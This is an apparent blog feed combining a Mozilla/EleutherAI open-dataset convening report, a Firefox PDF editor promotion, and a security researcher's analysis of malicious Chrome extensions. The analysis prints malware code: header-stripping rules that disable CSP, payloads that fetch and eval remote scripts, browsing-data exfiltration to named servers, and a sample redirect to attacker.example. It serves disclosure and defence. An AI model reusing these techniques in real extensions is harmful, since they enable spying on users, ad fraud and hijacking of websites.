Leading AI companies want us to believe that training performant LLMs without copyrighted material is impossible. We refuse to believe this. An emerging ecosystem of open LLM developers have created LLM training datasets, such as Common Corpus, YouTube-Commons, FineWeb, Dolma, Aya, Red Pajama and many more, that could provide blueprints for more transparent and responsible AI progress. We were excited to invite many of them to join us in Amsterdam for a series of discussions about the challenges and opportunities of building an alternative to the current status quo that is open, legally compliant and just.

During the event, we drew on the lessons from assembling “Common Pile” (the soon-to-be-released dataset by EleutherAI composed only of openly licensed and public domain data), which incorporates many learnings from its hugely successful predecessor, “The Pile.” At the event, EleutherAI released a technical briefing and an invitation to public consultation on Common Pile.

[Photo: participants engaged in a discussion at “The Dataset Convening,” hosted by Mozilla and EleutherAI on June 11, 2024 to explore creating open-access and openly licensed LLM training datasets.]

Our goal with the convening was to bring in the experiences of open dataset builders to develop normative and technical recommendations and best practices around openly licensed and open-access datasets. Below are some highlights of our discussion:

  • Openness alone does not guarantee legal compliance or ethical outcomes; we asked which decision points can contribute to datasets being more just and sustainable in terms of public good and data rights.
  • We discussed what “good” looks like, what we want to avoid, what is realistic and what is already being implemented in the realm of sourcing, curating, governing and releasing open training datasets. 
  • Issues such as the cumbersome nature of sourcing public domain and openly licensed data (e.g. extracting text from PDFs), manual verification of metadata, legal status of data across jurisdictions, retractability of consent, preference signaling, reproducibility and data curation and filtering were recurring themes in almost every discussion.
  • To enable more builders to develop open datasets, we need financial sustainability and smart infrastructural investments that can unblock the ecosystem.
  • The challenges faced by open datasets today bear a resemblance to those encountered in the early days of open source software (data quality, standardization and sustainability). Back then, it was the common artifacts that united the community and provided some shared understanding and language. We saw the Dataset Convening as an opportunity to start exactly there and create shared reference points that, even if not perfect, will guide us in a common direction.
  • The final insight round underscored that we have much to learn from each other: we are still in the early days of solving this immense challenge, and this nascent community needs to collaborate and think in radical and bold ways.
[Photo: participants at the Mozilla and EleutherAI event collaborating on best practices for creating open-access and openly licensed LLM training datasets.]

We are immensely grateful to the participants in the Dataset Convening (including some remote contributors):

  • Stefan Baack — Researcher and Data Analyst, Insights, Mozilla
  • Mitchell Baker — Chairwoman, Mozilla Foundation
  • Ayah Bdeir — Senior Advisor, Mozilla
  • Julie Belião — Senior Director of Product Innovation, Mozilla.ai
  • Jillian Bommarito — Chief Risk Officer, 273 Ventures
  • Kasia Chmielinski — Project Lead, Data Nutrition Project
  • Jennifer Ding — Senior Researcher, Alan Turing Institute
  • Alix Dunn — CEO, Computer Says Maybe
  • Marzieh Fadaee — Senior Research Scientist, Cohere For AI
  • Maximilian Gahntz — AI Policy Lead, Mozilla
  • Paul Keller — Director of Policy and Co-Founder, Open Future
  • Hynek Kydlíček — Machine Learning Engineer, HuggingFace
  • Pierre-Carl Langlais — Co-Founder, Pleias
  • Greg Leppert — Director of Product and Research, the Library Innovation Lab, Harvard
  • EM Lewis-Jong — Director, Common Voice, Mozilla
  • Shayne Longpre — Project Lead, Data Provenance Initiative
  • Angela Lungati — Executive Director, Ushahidi
  • Sebastian Majstorovic — Open Data Specialist, EleutherAI
  • Cullen Miller — Vice President of Policy, Spawning
  • Victor Miller — Senior Product Manager, LLM360
  • Kasia Odrozek — Director, Insights, Mozilla
  • Guilherme Penedo — Machine Learning Research Engineer, HuggingFace
  • Neha Ravella — Research Project Manager, Insights Mozilla
  • Michael Running Wolf — Co-Founder and Lead Architect, First Languages AI Reality, Mila
  • Max Ryabinin — Distinguished Research Scientist, Together AI 
  • Kat Siminyu — Researcher, The Distributed AI Research Institute
  • Aviya Skowron — Head of Policy and Ethics, EleutherAI
  • Andrew Strait — Associate Director, Ada Lovelace Institute
  • Mark Surman — President, Mozilla Foundation
  • Anna Tumadóttir — CEO, Creative Commons
  • Marteen Van Segbroeck — Head of Applied Science, Gretel
  • Leandro von Werra — Chief Loss Officer, HuggingFace
  • Maurice Weber — AI Researcher, Together AI
  • Lee White — Senior Full Stack Developer, Ushahidi
  • Thomas Wolf — Chief Science Officer and Co-Founder, HuggingFace

In the coming weeks, we will be working with the participants to develop common artifacts that will be released to the community, along with an accompanying paper. These resources will help researchers and practitioners navigate the definitional and executional complexities of advancing open-access and openly licensed datasets and strengthen the sense of community. 

The event was part of the Mozilla Convening Series, where we bring together leading innovators in open source AI to tackle thorny issues and help move the community and movement forward. Our first convening was the Columbia Convening where we invited 40 leading scholars and practitioners to develop a framework for defining what openness means in AI. We are committed to continuing the efforts to support communities invested in openness around AI and look forward to helping grow and strengthen this movement. 

The post Mozilla, EleutherAI publish research on open datasets for LLM training appeared first on The Mozilla Blog.

The Mozilla BlogStreamline your schoolwork with Firefox’s PDF editor

As a student pursuing a master’s degree, I’ve spent too much time searching for PDF editors to fill out forms, take notes and complete projects. I discovered Firefox’s built-in PDF editor while interning at Mozilla as a corporate communications intern. No more giving out my email address or downloading dubious software that puts my data at risk. The built-in PDF tool in Firefox is a secure, efficient solution that saves me time. Here’s how it has made my academic life easier.

Fill out applications and forms effortlessly

Remember those days when you had to print a form, fill it out and then scan it back into your computer? I know: tedious. With Firefox’s PDF editor, you can fill out forms directly in your browser. Just open the PDF in Firefox on your smartphone or computer, click the “text” button, and you’re all set to type away. It’s a game-changer for all those scholarship applications and administrative forms, or even the adult-life documents we constantly have to fill out.

[Screenshot: using the text tool in the PDF editor to add and edit text, with options for color and size.]

Highlight and annotate lecture slides for efficient note-taking

I used to print my professors’ lecture slides and study materials just to add notes. Now, I keep my annotations within the browser – highlighting key points and adding notes. You can even choose your text size and color. This capability not only enhances my note-taking, it saves some trees too. No more losing 50-page printed slides around campus. 

[Screenshot: highlighting text and adding notes in a PDF using the highlight tool.]

Sign documents electronically without hassle

Signing a PDF document was the single biggest dread I had as a millennial, a simple task made difficult. I used to search “free PDF editor” online and hand over my personal information to create an account just to use free software. Firefox makes it simple. Here’s how: click the draw icon, select your preferred color and thickness, and draw your signature directly on the document. Signing documents electronically finally feels like a 21st-century achievement.

[Screenshot: using the underline tool in the PDF editor to underline and correct text, with options for color, thickness, and opacity.]

Easily insert and customize images in your PDFs

Sometimes, adding an image to your PDF is necessary, whether it’s a graph for a report or a picture for a project. Firefox lets you upload and adjust images right within the PDF. You can even add alternative text or alt-text to make your documents more accessible, ensuring everyone in your group can understand your work.

[Screenshot: the PDF editor displaying a red fox photo with an alt-text box open, suggesting “A red fox looking into the distance.”]

There are endless ways to make Firefox your own, however you choose to navigate the internet. We want to know how you customize Firefox. Let us know and tag us on X or Instagram at @Firefox.

Get Firefox

Get the browser that protects what’s important

The post Streamline your schoolwork with Firefox’s PDF editor appeared first on The Mozilla Blog.

Wladimir PalantMalicious extensions circumvent Google’s remote code ban

As noted last week, I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn’t in the form of a policy but rather a technical change introduced with Manifest V3.

As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I’ve already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions essentially creating their own programming language. This article looks into more approaches I found used by malicious extensions in Chrome Web Store. And maybe Google will decide to prohibit remote code as a policy after all.

[Screenshot of a Google webpage titled “Deal with remote hosted code violations.” The page text visible in the screenshot says: Remotely hosted code, or RHC, is what the Chrome Web Store calls anything that is executed by the browser that is loaded from someplace other than the extension’s own files. Things like JavaScript and WASM. It does not include data or things like JSON or CSS.]

Update (2025-01-20): Added two extensions to the bonus section. Also indicated in the tables which extensions are currently featured in Chrome Web Store.

Update (2025-01-21): Got a sample of the malicious configurations for Phoenix Invicta extensions. Added a section describing it and removed “But what do these configurations actually do” section. Also added a bunch more domains to the IOCs section.

Update (2025-01-28): Corrected the “Netflix Party” section, Flipshope extension isn’t malicious after all. Also removed the attribution subsection here.

Summary of the findings

This article originally started as an investigation into Phoenix Invicta Inc. Consequently, this is the best researched part of it. While I could attribute only 14 extensions with rather meager user numbers to Phoenix Invicta, that’s likely because they’ve only started recently. I could find a large number of domain names, most of which aren’t currently being used by any extensions. A few are associated with extensions that have been removed from Chrome Web Store but most seem to be reserved for future use.

It can be assumed that these extensions are meant to inject ads into web pages, yet Phoenix Invicta clearly put some thought into plausible deniability. They can always claim their execution of remote code to be a bug in their otherwise perfectly legitimate extension functionality. So it will be interesting to see how Google will deal with these extensions, lacking (to my knowledge) any policies that apply here.

The malicious intent is a bit more obvious with Netflix Party and related extensions. This shouldn’t really come as a surprise to Google: the most popular extension of the group was a topic on this blog back in 2023, and a year before that McAfee already flagged two extensions of the group as malicious. Yet here we are, and these extensions are still capable of spying, affiliate fraud and cookie stuffing as described by McAfee. If anything, their potential to do damage has only increased.

Finally, the group of extensions around Sweet VPN is the most obviously malicious one. To be fair, what these extensions do is probably best described as obfuscation rather than remote code execution. Still, they download extensive instructions from their web servers even though these aren’t too flexible in what they can do without requiring changes to the extension code. Again there is spying on the users and likely affiliate fraud as well.

In the following sections I will be discussing each group separately, listing the extensions in question at the end of each section. There is also a complete list of websites involved in downloading instructions at the end of the article.

Phoenix Invicta

Let’s first take a look at an extension called “Volume Booster - Super Sound Booster.” It is one of several similar extensions and it is worth noting that the extension’s code is neither obfuscated nor minified. It isn’t hiding any of its functionality, relying on plausible deniability instead.

For example, in its manifest this extension requests access to all websites:

"host_permissions": [
  "http://*/*",
  "https://*/*"
],

Well, it obviously needs that access because it might have to boost volume on any website. Of course, it would be possible to write this extension in a way that the activeTab permission would suffice. But it isn’t built in this way.

Similarly, one could easily write a volume booster extension that doesn’t need to download a configuration file from some web server. In fact, this extension works just fine with its default configuration. But it will still download its configuration roughly every six hours just in case (code slightly simplified for readability):

let res = await fetch(`https://super-sound-booster.info/shortcuts?uuid=${userId}`,{
    method: 'POST',
    body: JSON.stringify({installParams}),
    headers: { 'Content-Type': 'text/plain' }
});
let data = await res.json();
if (data.shortcuts) {
    chrome.storage.local.set({
        shortcuts: {
            list: data.shortcuts,
            updatedAt: Date.now(),
        }
    });
}
if (data.volumeHeaders) {
    chrome.storage.local.set({
        volumeHeaderRules: data.volumeHeaders
    });
}
if (data.newsPage) {
    this.openNewsPage(data.newsPage.pageId, data.newsPage.options);
}

This will send a unique user ID to a server which might then respond with a JSON file. Conveniently, the three possible values in this configuration file correspond to three malicious functions of the extension.

Injecting HTML code into web pages

The extension contains a default “shortcut” which it will inject into all web pages. It can typically be seen in the lower right corner of a web page:

[Image: Screenshot of a web page footer with the Privacy, Terms and Settings links. Overlaying the latter is a colored diagonal arrow with a rectangular pink border.]

And if you move your mouse pointer to that button a message shows up:

[Image: Screenshot of a web page footer. Overlaying it is a pink pop-up saying: To go Full-Screen, press F11 when watching a video.]

That’s it, it doesn’t do anything else. This “feature” makes no sense but it provides the extension with plausible deniability: it has a legitimate reason to inject HTML code into all web pages.

And of course that “shortcut” is remotely configurable. So the shortcuts value in the configuration response can define other HTML code to be injected, along with a regular expression determining which websites it should be applied to.

“Accidentally” this HTML code isn’t subject to the remote code restrictions that apply to browser extensions. After all, any JavaScript code contained here would execute in the context of the website, not in the context of the extension. While that code wouldn’t have access to the extension’s privileges, the end result is pretty much the same: it could e.g. spy on the user as they use the web page, transmit login credentials being entered, inject ads into the page and redirect searches to a different search engine.
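
To illustrate why this matters, here is a minimal sketch of how a configurable “shortcut” turns into code execution in the page. The shortcut value is hypothetical, not one actually observed:

// Hypothetical server-supplied “shortcut” value
const shortcut = '<img src="x" onerror="alert(document.cookie)">';

// Roughly what happens when the extension injects it into a page
const container = document.createElement("div");
container.innerHTML = shortcut;       // parses attacker-controlled HTML
document.body.appendChild(container); // the inline onerror handler runs in the page context

Note that innerHTML will not execute <script> tags, but inline event handlers like this one do run, unless the page’s Content Security Policy forbids them.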

Abusing declarativeNetRequest API

There is only a slight issue here: a website might use a security mechanism called Content Security Policy (CSP). And that mechanism can for example restrict what kind of scripts are allowed to run on the web site, in the same way the browser restricts the allowed scripts for the extension.

The extension solves this issue by abusing the immensely powerful declarativeNetRequest API. Looking at the extension manifest, a static rule is defined for this API:

[
    {
        "id": 1,
        "priority": 1,
        "action": {
            "type": "modifyHeaders",
            "responseHeaders": [
                { "header": "gain-id", "operation": "remove" },
                { "header": "basic-gain", "operation": "remove" },
                { "header": "audio-simulation-64-bit", "operation": "remove" },
                { "header": "content-security-policy", "operation": "remove" },
                { "header": "audio-simulation-128-bit", "operation": "remove" },
                { "header": "x-frame-options", "operation": "remove" },
                { "header": "x-context-audio", "operation": "remove" }
            ]
        },
        "condition": { "urlFilter": "*", "resourceTypes": ["main_frame","sub_frame"] }
    }
]

This removes a bunch of headers from all HTTP responses. Most headers listed here are red herrings – a gain-id HTTP header for example doesn’t really exist. But removing Content-Security-Policy header is meant to disable CSP protection on all websites. And removing X-Frame-Options header disables another security mechanism that might prevent injecting frames into a website. This probably means that the extension is meant to inject advertising frames into websites.

But these default declarativeNetRequest rules aren’t the end of the story. The volumeHeaders value in the configuration response allows adding more rules whenever the server decides that some are needed. As these rules aren’t code, the usual restrictions against remote code don’t apply here.

The name seems to suggest that these rules are all about messing with HTTP headers. And maybe this actually happens, e.g. adding cookie headers required for cookie stuffing. But judging from other extensions the main point is rather preventing any installed ad blockers from blocking ads displayed by the extension. Yet these rules provide even more damage potential. For example, declarativeNetRequest allows “redirecting” requests, which at first glance is a very convenient way to perform affiliate fraud. It can also “redirect” a request when a website loads a script from a trusted source, making it receive a malicious script instead – another way to hijack websites.
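
For illustration, a server-supplied rule of the kind described could look roughly like this. This is a sketch with hypothetical addresses, not a rule actually observed:

// A dynamic rule that silently swaps a trusted script for a malicious one
chrome.declarativeNetRequest.updateDynamicRules({
  addRules: [{
    id: 100,
    priority: 1,
    action: {
      type: "redirect",
      redirect: { url: "https://attacker.example/evil.js" }
    },
    condition: {
      urlFilter: "https://trusted.example/library.js",
      resourceTypes: ["script"]
    }
  }]
});

Any page loading library.js would then execute evil.js instead, without any change to the extension’s code.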

Side-note: This abuse potential is the reason why legitimate ad blockers, while downloading their rules from a web server, never make these rules as powerful as the declarativeNetRequest API. It’s bad enough that a malicious rule could break the functionality of a website, but it shouldn’t be able to spy on the user for example.

Opening new tabs

Finally, there is the newsPage value in the configuration response. It is passed to the openNewsPage function which is essentially a wrapper around the tabs.create() API. This will load a page in a new tab, something that extension developers typically use for benign things like asking for donations.

Except that Volume Booster and similar extensions don’t merely take a page address from the configuration but also some options. Volume Booster will accept any options; other extensions will sometimes allow only specific ones. One option that the developers of these extensions seem to particularly care about is active, which allows opening tabs in the background. This makes me suspect that the point of this feature is displaying pop-under advertisements.
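
A minimal sketch of why that option matters (the page address is hypothetical):

// Opens a page in a background tab, where the user may never notice it.
// This is the classic pop-under pattern.
chrome.tabs.create({ url: "https://ads.example/landing", active: false });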

The scheme summarized

There are many extensions similar to Volume Booster. The general approach seems to be:

  1. Make sure that the extension has permission to access all websites. Find a pretense why this is needed – or don’t, Google doesn’t seem to care too much.
  2. Find a reason why the extension needs to download its configuration from a web server. It doesn’t need to be convincing, nobody will ever ask why you couldn’t just keep that “configuration” in the extension.
  3. Use a part of that configuration in HTML code that the extension will inject in web pages. Of course you should “forget” to do any escaping or sanitization, so that HTML injection is possible.
  4. Feed another part of the configuration to declarativeNetRequest API. Alternatively (or additionally), use static rules in the extension that will remove pesky security headers from all websites, nobody will ask why you need that.

Not all extensions implement all of these points. With some of the extensions the malicious functionality seems incomplete. I assume that it isn’t being added all at once; instead, support for malicious configurations is added slowly to avoid raising suspicions. And maybe for some extensions the current state is considered “good enough,” so nothing more is to come.

The payload

After I had already published this article I finally got a sample of the malicious “shortcut” value, to be applied on all websites. Unsurprisingly, it had the form:

<img height="1" width="1" src="data:image/gif;base64,…"
     onload="(() => {…})();this.remove()">

This injects an invisible image into the page, runs some JavaScript code via its load event handler and removes the image again. The JavaScript code consists of two code blocks. The first block goes like this:

if (isGoogle() || isFrame()) {
    hideIt();
    const script = yield loadScript();
    if (script) {
        window.eval.call(window, script);
        window.gsrpdt = 1;
        window.gsrpdta = '_new'
    }
}

The isGoogle function looks for a Google subdomain and a query – this is about search pages. The isFrame function looks for frames but excludes “our frames” where the address contains all the strings q=, frmid and gsc.page. The loadScript function fetches a script from https://shurkul[.]online/v1712/g1001.js. This script then injects a hidden frame into the page, loaded either from kralforum.com.tr (Edge) or rumorpix.com (other browsers). There is also some tracking to an endpoint on dev.astralink.click but the main logic operating the frame is in the other code block.

The second code block looks like this (somewhat simplified for readability):

if (window.top == window.self) {
    let response = await fetch('https://everyview.info/c', {
        method: 'POST',
        body: btoa(unescape(encodeURIComponent(JSON.stringify({
            u: 'm5zthzwa3mimyyaq6e9',
            e: 'ojkoofedgcdebdnajjeodlooojdphnlj',
            d: document.location.hostname,
            t: document.title,
            'iso': 4
        })))),
        headers: {
            'Content-Type': 'text/plain'
        },
        credentials: 'include'
    });
    let text = await response.text();
    runScript(decodeURIComponent(escape(atob(text))));
} else {
    window.addEventListener('message', function(event) {
        event && event.data && event.data.boosterWorker &&
            event.data.booster && runScript(event.data.booster);
    });
}

So for top-level documents this downloads some script from everyview.info and runs it. That script in turn injects another script from lottingem.com. And that script loads some ads from gulkayak.com or topodat.info as well as Google ads, makes sure these are displayed in the frame and positions the frame above the search results. The result is ads that can barely be distinguished from actual search results. Here is what I get when searching for “amazon”, for example:

[Image: Screenshot of what looks like Google search results, e.g. a link titled “Amazon Produkte - -5% auf alle Produkte”. The website mentioned above it is conrad.de however rather than amazon.de.]

The second code block also has some additional tracking going to doubleview.online, astato.online, doublestat.info, triplestat.online domains.

The payloads I got for the Manual Finder 2024 and Manuals Viewer extensions are similar but not identical. In particular, these use the fivem.com.tr domain for the frame. But the result is essentially the same: ads that are almost impossible to distinguish from the search results. In this screenshot the link at the bottom is a search result, the one above it is an ad:

[Image: Screenshot of search results. Above, a link titled “Amazon - Import US to Germany” with the domain myus.com. Below, an actual Amazon.de link. Both have exactly the same visuals.]

Who is behind these extensions?

These extensions are associated with a company named Phoenix Invicta Inc, formerly Funteq Inc. While supposedly a US company of around 20 people, its terms of service claim to be governed by Hong Kong law, all while the company hires its employees in Ukraine. While it doesn’t seem to have any physical offices, the company offers its employees the use of two co-working spaces in Kyiv. To add even more confusion, Funteq Inc. was registered in the US with its “office address” being a two-room apartment in Moscow.

Before founding this company in 2016 its CEO worked as CTO of something called Ormes.ru. Apparently, Ormes.ru was in the business of monetizing apps and browser extensions. Its sales pitches can still be found all over the web, offering extension developers ways to earn money with various kinds of ads. Clearly, there has been some competence transfer here.

Occasionally Phoenix Invicta websites will claim to be run by another company named Damiko Inc. Of course these claims don’t have to mean anything, as the same websites will also occasionally claim to be run by a company in the business of … checks notes … selling knives.

Yet Damiko Inc. is officially offering a number of extensions in the Chrome Web Store. And while these certainly aren’t the same as the Phoenix Invicta extensions, all but one of these extensions share certain similarities with them. In particular, these extensions remove the Content-Security-Policy HTTP header despite having no means of injecting HTML content into web pages from what I can tell.

Damiko Inc. appears to be a subsidiary of the Russian TomskSoft LLC, operating in the US under the name Tomsk Inc. How does this fit together? Did TomskSoft contract Phoenix Invicta to develop browser extensions for them? Or is Phoenix Invicta another subsidiary of TomskSoft? Or some other construct maybe? I don’t know. I asked TomskSoft for comment on their relationship with this company but haven’t received a response so far.

The affected extensions

The following extensions are associated with Phoenix Invicta:

Name Weekly active users Extension ID Featured
Click & Pick 20 acbcnnccgmpbkoeblinmoadogmmgodoo
AdBlock for Youtube: Skip-n-Watch 3,000 coebfgijooginjcfgmmgiibomdcjnomi
Dopni - Automatic Cashback Service 19 ekafoahfmdgaeefeeneiijbehnbocbij
SkipAds Plus 95 emnhnjiiloghpnekjifmoimflkdmjhgp
1-Click Color Picker: Instant Eyedropper (hex, rgb, hsl) 10,000 fmpgmcidlaojgncjlhjkhfbjchafcfoe
Better Color Picker - pick any color in Chrome 10,000 gpibachbddnihfkbjcfggbejjgjdijeb
Easy Dark Mode 869 ibbkokjdcfjakihkpihlffljabiepdag
Manuals Viewer 101 ieihbaicbgpebhkfebnfkdhkpdemljfb
ScreenCapX - Full Page Screenshot 20,000 ihfedmikeegmkebekpjflhnlmfbafbfe
Capture It - Easy Screenshot Tool (Full Page, Selected, Visible Area) 48 lkalpedlpidbenfnnldoboegepndcddk
AdBlock - Ads and Youtube 641 nonajfcfdpeheinkafjiefpdhfalffof
Manual Finder 2024 280 ocbfgbpocngolfigkhfehckgeihdhgll
Volume Booster - Super Sound Booster 8,000 ojkoofedgcdebdnajjeodlooojdphnlj
Font Expert: Identify Fonts from Images & Websites 666 pjlheckmodimboibhpdcgkpkbpjfhooe

The following table also lists the extensions officially developed by Damiko Inc. With these, there is no indication of malicious intent, yet all but the last one share similarities with Phoenix Invicta extensions above and remove security headers.

Name Weekly active users Extension ID Featured
Screen Recorder 685 bgnpgpfjdpmgfdegmmjdbppccdhjhdpe
Halloween backgrounds and stickers for video calls and chats 31 fklkhoeemdncdhacelfjeaajhfhoenaa
AI Webcam Effects + Recorder: Google Meet, Zoom, Discord & Other Meetings 46 iedbphhbpflhgpihkcceocomcdnemcbj
Beauty Filter 136 mleflnbfifngdmiknggikhfmjjmioofi
Background Noise Remover 363 njmhcidcdbaannpafjdljminaigdgolj
Camera Picture In Picture (PIP Overlay) 576 pgejmpeimhjncennkkddmdknpgfblbcl

Netflix Party

Back in 2023 I pointed out that “Adblock all advertisements” is malicious and spying on its users. A year earlier McAfee already called out a bunch of extensions as malicious. For whatever reason, Google decided to let Adblock all advertisements stay, and three extensions from the McAfee article also remained in Chrome Web Store: Netflix Party, FlipShope and AutoBuy Flash Sales. Out of these three, Netflix Party and AutoBuy Flash Sales still (or again) contain malicious functionality.

Update (2025-01-28): This article originally claimed that the FlipShope extension was also malicious and listed this extension cluster under the name of its developing company, Technosense Media. This was incorrect; the extension merely contained some recognizable but dead code. According to Technosense Media, they bought the extension in 2023. Presumably, the problematic code was introduced by the previous extension owner and is unused.

Spying on the users

Coming back to Adblock all advertisements, it is still clearly spying on its users, using ad blocking functionality as a pretense to send the address of each page visited to its server (code slightly simplified for readability):

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if ("complete" === changeInfo.status) {
    let params = {
      url: tab.url,
      userId: await chrome.storage.sync.get("userId")
    };
    const response = await fetch("https://smartadblocker.com/extension/rules/api", {
      method: "POST",
      credentials: "include",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(params)
    });
    const rules = await response.json();
    
  }
});

Supposedly, this code downloads a set of site-specific rules. In theory this could be legitimate functionality not meant to spy on users. The giveaway isn’t merely that the endpoint doesn’t produce any meaningful responses. Legitimate functionality with no intention to spy wouldn’t send a unique user ID with the request, would cut the page address down to the host name (or at least strip all of its parameters), and would cache the response. The latter is done simply to reduce the load on the endpoint, something anybody does unless the endpoint is being paid for with users’ data.
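
For comparison, here is a sketch of what a genuinely privacy-conscious version of this download could look like. The endpoint and storage layout are made up for illustration:

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if (changeInfo.status !== "complete") return;
  const host = new URL(tab.url).hostname;  // host name only, no parameters
  const cached = await chrome.storage.local.get(host);
  if (cached[host]) return;                // reuse cached rules, reduce server load
  const response = await fetch(`https://rules.example/api?host=${encodeURIComponent(host)}`);
  await chrome.storage.local.set({ [host]: await response.json() });
});

No unique user ID, no full page address, and repeat visits don’t even hit the server.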

The bogus rule processing

Nothing in the section above is new; I already wrote as much in 2023. But either I didn’t take a close look at the rule processing back then, or it has gotten considerably worse. Here is what it looks like today (variable and function naming is mine, the code was minified):

for (const key in rules)
  if ("id" === key || "genericId" === key) {
    // Remove elements by ID
  } else if ("class" === key || "genericClass" === key) {
    // Remove elements by class name
  } else if ("innerText" === key) {
    // Remove elements by text
  } else if ("rules" === key) {
    if (rules.updateRules)
      applyRules(rules[key], rules.rule_scope, tabId);
  } else if ("cc" === key) {
    // Bogus logic to let the server decide which language-specific filter list
    // should be enabled
  }

The interesting part here is the applyRules call which conveniently isn’t triggered by the initial server responses (updateRules key is set to false). This function looks roughly like this:

async function applyRules(rules, scope, tabId) {
  if ("global" !== scope) {
    if (0 !== rules.length) {
      const existingRules = await chrome.declarativeNetRequest.getDynamicRules();
      const ruleIds = existingRules.map(rule => rule.id);
      chrome.declarativeNetRequest.updateDynamicRules({
        removeRuleIds: ruleIds,
        addRules: rules
      });
    }
  } else {
    chrome.tabs.sendMessage(tabId, {
      message: "start",
      link: rules
    });
  }
}

So if the “scope” is anything but "global", the rules provided by the server will be added to the declarativeNetRequest API. Modifying these rules on a per-request basis makes no sense for ad blocking, but it opens up rich possibilities for abuse as we’ve seen already. Given what McAfee discovered about these extensions before, this is likely meant for cookie stuffing, yet execution of arbitrary JavaScript code in the context of targeted web pages is also a possible scenario.

And if the “scope” is "global" the extension sends a message to its content script which will inject a frame with the given address into the page. Again, this makes no sense whatsoever for blocking ads, but it definitely works for affiliate fraud – which is what these extensions are all about according to McAfee.

Depending on the extension there might be only frame injection or only adding of dynamic rules. Given the purpose of the AutoBuy extension, it can probably pass as legitimate by Google’s rules; the others, not so much.

The affected extensions

Name Weekly active users Extension ID Featured
Auto Refresh Plus 100,000 ffejlioijcokmblckiijnjcmfidjppdn
Smart Auto Refresh 100,000 fkjngjgmgbfelejhbjblhjkehchifpcj
Adblock all advertisement - No Ads extension 700,000 gbdjcgalliefpinpmggefbloehmmknca
AutoBuy Flash Sales, Deals, and Coupons 20,000 gbnahglfafmhaehbdmjedfhdmimjcbed
Autoskip for Youtube™ Ads 200,000 hmbnhhcgiecenbbkgdoaoafjpeaboine
Smart Adblocker 50,000 iojpcjjdfhlcbgjnpngcmaojmlokmeii
Adblock for Browser 10,000 jcbjcocinigpbgfpnhlpagidbmlngnnn
Netflix Party 500,000 mmnbenehknklpbendgmgngeaignppnbe
Free adblocker 8,000 njjbfkooniaeodkimaidbpginjcmhmbm
Video Ad Block Youtube 100,000 okepkpmjhegbhmnnondmminfgfbjddpb
Picture in Picture for Videos 30,000 pmdjjeplkafhkdjebfaoaljknbmilfgo

Update (2025-01-28): Added Auto Refresh Plus and Picture in Picture for Videos to the list. The former only contains the spying functionality, the latter spying and frame injection.

Sweet VPN

I’ll be looking at Sweet VPN as representative for 32 extensions I found using highly obfuscated code. These extensions aren’t exactly new to this blog either: my post in 2023 already named three of them, even though I couldn’t identify the malicious functionality back then. Most likely I simply overlooked it; I didn’t have time to investigate each extension thoroughly.

These extensions also decided to circumvent remote code restrictions but their approach is way more elaborate. They download some JSON data from the server and add it to the extension’s storage. While some keys like proxy_list are expected here and always present, a number of others are absent from the server response when the extension is first installed. These can contain malicious instructions.

Anti-debugging protection

For example, the four keys 0, 1, 2, 3 seem to be meant for anti-debugging protection. If present, the values of these keys are concatenated and parsed as JSON into an array. A property resolution mechanism then allows resolving arbitrarily deep values, starting at the self object of the extension’s background worker. The result is three values which are used like this:

value1({value2: value3}, result => {
  
});

This call is repeated every three seconds. If result is a non-empty array, the extension removes all but a few storage keys and stops further checks. This is clearly meant to remove traces of malicious activity. I am not aware of any ways for an extension to detect an open Developer Tools window, so this call is probably meant to detect the extension management page that Developer Tools are opened from:

chrome.tabs.query({"url": "chrome://extensions/*"}, result => {
  
});
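
To make the mechanism more concrete, here is a sketch of how such property resolution could work. The stored values are my guesses at the format, not actual server data:

// Hypothetical resolved values (the real ones come concatenated from keys 0–3)
const [path, key, val] = ["chrome.tabs.query", "url", "chrome://extensions/*"];

// Resolve a dotted path starting from the worker’s global object
const resolve = p => p.split(".").reduce((obj, k) => obj && obj[k], self);

const value1 = resolve(path); // chrome.tabs.query
value1({ [key]: val }, result => {
  // a non-empty result means an extensions page is open: wipe the evidence
});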

Guessing further functionality

This protection mechanism is only a very small part of the obfuscated logic in the extension. There are lots of values being decoded, tossed around, used in some function calls. It is difficult to reconstruct the logic with the key parts missing. However, the extension doesn’t have too many permissions:

"permissions": [
  "proxy",
  "storage",
  "tabs"
],
"host_permissions": [
  "https://ipapi.co/json/",
  "https://ip.seeip.org/geoip",
  "https://api.myip.com/",
  "https://ifconfig.co/json"
],

Given that almost no websites can be accessed directly, it’s a safe bet that the purpose of the concealed functionality is spying on the users. That’s what the tabs permission is for, to be notified of any changes in the user’s browsing session.

In fact, once you know that the function being passed as a parameter is a tabs.onUpdated listener, its logic becomes way easier to understand despite the missing parts. So the cl key in the extension’s storage (other extensions often use other names) is the event queue where data about the user’s browsing is being stored. Once there are at least 10 events, the queue is sent to the same address the extension downloads its configuration from.
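
Reconstructed from the visible parts, the listener likely behaves roughly like this. This is a sketch with guessed names, the real code being heavily obfuscated:

const configUrl = "https://sweet-vpn.com/…"; // same address the configuration comes from

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if (changeInfo.status !== "complete") return;
  const { cl = [] } = await chrome.storage.local.get("cl");
  cl.push({ url: tab.url, title: tab.title, time: Date.now() });
  if (cl.length >= 10) {
    await fetch(configUrl, { method: "POST", body: JSON.stringify(cl) });
    await chrome.storage.local.set({ cl: [] });
  } else {
    await chrome.storage.local.set({ cl });
  }
});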

There are also some chrome.tabs.update() calls in the code, replacing the address of the currently loading page by something else. It’s hard to be certain what these are used for: it could be search redirection, affiliate fraud or plainly navigating to advertising pages.

The affected extensions

Name Weekly active users Extension ID Featured
VK UnBlock. Works fast. 40,000 ahdigjdpekdcpbajihncondbplelbcmo
VPN Proxy Master 120 akkjhhdlbfibjcfnmkmcaknbmmbngkgn
VPN Unblocker for Instagram 8,000 akmlnidakeiaipibeaidhlekfkjamgkm
StoriesHub 100,000 angjmncdicjedpjcapomhnjeinkhdddf
Facebook and Instagram Downloader 30,000 baajncdfffcpahjjmhhnhflmbelpbpli
Downloader for Instagram - ToolMaster 100,000 bgbclojjlpkimdhhdhbmbgpkaenfmkoe
